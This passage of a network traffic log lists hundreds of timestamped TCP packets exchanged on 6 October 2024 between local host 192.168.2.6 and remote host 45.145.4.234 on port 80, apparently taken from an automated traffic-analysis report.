                                                                                                                                                Oct 6, 2024 22:18:48.319327116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319328070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319363117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319370031 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319402933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319434881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319468975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319478989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319500923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319509029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319534063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319538116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319574118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319575071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319607973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319616079 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319639921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319647074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319669962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319681883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319701910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319706917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319739103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319741964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319773912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319786072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319813013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319823980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319858074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319864035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319894075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319900036 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319927931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319938898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319962025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319967985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319993019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320002079 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320025921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320029974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320066929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320066929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320101023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320106983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320133924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320142031 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320171118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320173025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320204020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320211887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320238113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320242882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320270061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320277929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320303917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320311069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320336103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320342064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320370913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320377111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320404053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.320408106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.320446968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.402914047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403032064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403069019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403126001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403161049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403192997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403225899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403228998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403264046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403276920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403276920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403276920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403316021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403337955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403352022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403368950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403414011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403417110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403448105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403476000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403484106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403501034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403537035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403544903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403570890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403594017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403600931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403631926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403634071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403645039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403693914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403728008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403757095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403762102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403785944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403810024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403812885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403851032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403883934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403903008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403917074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403933048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403949976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.403966904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.403983116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404000998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404016972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404027939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404052019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404066086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404084921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404099941 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404118061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404129982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404149055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404184103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404217958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404227018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404249907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404249907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404277086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404284000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404301882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404331923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404336929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404371977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404386044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404405117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404421091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404439926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404452085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404474020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404486895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404508114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404524088 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404542923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404556990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404577971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404587984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404611111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404628992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404645920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404654980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404679060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404689074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404712915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404721975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404747009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404750109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404782057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404793978 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404817104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404828072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404853106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404858112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404886961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404895067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404922962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404932976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404957056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.404966116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.404992104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405002117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405025005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405030966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405059099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405067921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405092001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405107021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405126095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405141115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405157089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405175924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405194044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405199051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405226946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405237913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405258894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405277014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405292034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405303001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405324936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405330896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405359983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405374050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405394077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405405998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405426025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405437946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405459881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405472040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405493975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405508041 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405529022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405540943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405567884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405580997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405615091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405622959 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405647993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405658960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405690908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405690908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405719995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405734062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405754089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405759096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405786991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405790091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405821085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405833006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405854940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405864954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405900002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405908108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405942917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405947924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.405976057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.405988932 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406008959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406016111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406038046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406054020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406074047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406080961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406107903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406117916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406141043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406160116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406186104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406193018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406224966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406234980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406259060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406271935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406300068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406306028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406310081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406339884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406343937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406358957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406379938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406379938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406426907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406461000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406465054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406502008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406503916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406511068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406543016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406553984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406589985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406599998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406630993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406645060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406666040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406682968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406697989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406704903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406733036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406737089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406761885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406771898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406794071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406804085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406827927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406851053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406867981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406877995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406913996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406924963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406945944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406954050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.406980991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.406984091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407015085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407021999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407047033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407056093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407078028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407085896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407110929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407116890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407145023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407152891 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407179117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407186031 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407212019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407218933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407244921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.407258034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.407290936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.489902020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489927053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489937067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489945889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489958048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489969015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.489979029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490026951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490044117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490056992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490067005 CEST806388545.145.4.234192.168.2.6
